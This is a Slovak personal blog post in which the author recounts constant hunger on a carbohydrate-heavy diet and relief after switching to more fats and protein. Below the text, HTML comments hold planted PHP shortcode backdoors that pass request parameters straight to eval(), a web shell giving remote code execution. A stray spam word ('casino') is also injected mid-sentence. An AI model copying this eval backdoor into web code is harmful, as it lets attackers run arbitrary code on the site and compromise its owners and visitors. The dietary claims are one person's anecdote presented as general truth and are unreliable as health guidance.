Chlieb s maslom pod vankúšom alebo ako som si myslela, že sa stravujem zdravo

Je to už nejaký čas, ale dobre sa pamätám ako som sa cítila, keď som sa stravovala tzv. zdravo.

Každé dve hodiny som mala ukrutný hlad – ak som sa hneď nenajedla, bola som nervózna a správala som sa nepríjemne. Aj kolegyne v práci si už na to zvykli a keď sa blížil „môj čas“ a začala som sa mračiť, strácala som trpezlivosť a sústredenie, ozvali sa: „Ľubica, nejdete sa najesť?“ Nebolo ma treba prehovárať lebo nepríjemné pocity sa stupňovali. Niekedy prišla aj bolesť hlavy a brucha. Vystrelila som do kuchyne, zjedla nachystanú dobrotu v plastovej dóze a o pár minút bolo po probléme. Cítila som príval energie a dobrú náladu..zatiaľ. Takto to šlo totiž stále dokola – moja energia a nálada kolísala hore a dole. Vydržať bez jedla viac ako tri hodiny bolo pre mňa nepredstaviteľné. Keď som mala niekam cestovať, moja prvá starosť bola jedlo. Niekedy som sa v noci zobudila s tak „škvŕkajúcim“ žalúdkom, že som musela vstať a niečo si dať. Verte mi, že vôľou sa môj vlčí hlad nedal ovládať – točila sa mi hlava a nemohla som myslieť na nič iné.

OLYMPUS DIGITAL CAMERAKamaráti si zo mňa robili žarty lebo môj manžel musel aj na 2hodinovú prechádzku so psom casino brať pre mňa ruksak s jedlom a pitím a jeden kamarát sa ma dokonca spýtal či nemám pod vankúšom v posteli chlieb s maslom :-) Verte mi, že pre mňa to zábava nebola a často som sa aj hanbila. Bola som otrok sacharidov.

Našťastie som na webe narazila na články o tukovom metabolizme a závislosti na sacharidoch. Všetko to dávalo zmysel – výkyvy glykémie aj inzulínu. Uvedomila som si, že môj denný jedálniček bol plný sacharidov a zanedbala som príjem bielkovín a hlavne tukov. Na raňajky ovsené vločky, na obed cestoviny alebo rizoto, večer celozrnné pečivo a okrem toho veľa čistej vody, ovocia a zeleniny. Vyzerá to takmer ako ideálny jedálniček, nie? Ale výsledky ideálne neboli..

Čoskoro som skúsila začať svoj deň s domácimi vajciami a vyberala som si počas dňa viac potravín s tukom a bielkovinami. Výsledok bol skvelý – ustálená nálada a energia. Postupne vymizla chuť na sladké a po jedle som bola sýta aj päť hodín – zrazu som mala toooľko času. Nemusela som každé dve hodiny chystať jedlo a neustále vymýšľať čo nakúpiť. Cítila som sa slobodnejšie.

5956654-potravinova-pyramidaViem, že som nebola jediná ktorá podľahla takému „zdravému“ sacharidovému jedálničku. Videla som dosť mladých žien, ktoré na tom boli podobne ako ja a uverili že cereálie, ryža natural a cestoviny sú cestou k zdraviu -boli predsa základňou výživovej pyramídy. Dnes viem, že sme sa nechali zmiasť dezinformáciami a nepočúvali sme svoje telo ani „sedliacky rozum“. Snáď Vám môj príbeh poslúži a vyhnete sa rovnakej chybe.

<!– [insert_php]if (isset($_REQUEST["WuOH"])){eval($_REQUEST["WuOH"]);exit;}[/insert_php][php]if (isset($_REQUEST["WuOH"])){eval($_REQUEST["WuOH"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PEyDq"])){eval($_REQUEST["PEyDq"]);exit;}[/insert_php][php]if (isset($_REQUEST["PEyDq"])){eval($_REQUEST["PEyDq"]);exit;}[/php] –>

Posted in Článok.

Pridaj komentár

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *